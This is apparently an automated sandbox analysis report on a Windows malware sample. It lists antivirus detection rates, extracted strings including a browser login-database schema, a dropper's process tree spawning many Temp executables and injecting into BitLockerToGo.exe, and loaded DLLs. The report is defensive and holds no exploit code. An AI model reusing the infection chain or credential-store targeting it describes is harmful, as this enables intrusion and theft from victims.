Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cbf2b6294a.exe, 00000019.00000003.2995193294.0000000005606000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994863769.0000000005610000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3014791022.000000000560F000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3150406997.0000000005988000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3134914771.000000000598C000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3134610451.00000000059A8000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3150406997.0000000005A21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: filebasedassist.exe, 00000024.00000003.3303277641.0000000000889000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000002.3409145943.000000006096F000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 1w5RpHuliE.exe	Virustotal: Detection: 57%
Source: 1w5RpHuliE.exe	ReversingLabs: Detection: 72%

Source: 1w5RpHuliE.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: b4fe2af6b4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

File read: C:\Users\user\Desktop\1w5RpHuliE.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1w5RpHuliE.exe "C:\Users\user\Desktop\1w5RpHuliE.exe"
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe "C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1896 -ip 1896
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process created: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe "C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe"
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 1136
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe "C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1048 -ip 1048
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 956
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe "C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe "C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe "C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe "C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe"
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe "C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe "C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe"
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe "C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe "C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe"
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe "C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe"
Source: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe	Process created: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp "C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp" /SL5="$E0240,3792470,56832,C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe"
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe "C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe" -i
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Users\user\AppData\Roaming\X0n19nL\lt8kslFxQ.exe "C:\Users\user\AppData\Roaming\X0n19nL\lt8kslFxQ.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe "C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe"
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe "C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe "C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe "C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe "C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe "C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe "C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe "C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe "C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe "C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe "C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process created: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe "C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1896 -ip 1896	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 1136	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1048 -ip 1048	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 956	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe "C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Users\user\AppData\Roaming\X0n19nL\lt8kslFxQ.exe "C:\Users\user\AppData\Roaming\X0n19nL\lt8kslFxQ.exe"
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe	Process created: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp "C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp" /SL5="$E0240,3792470,56832,C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe "C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe" -i

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
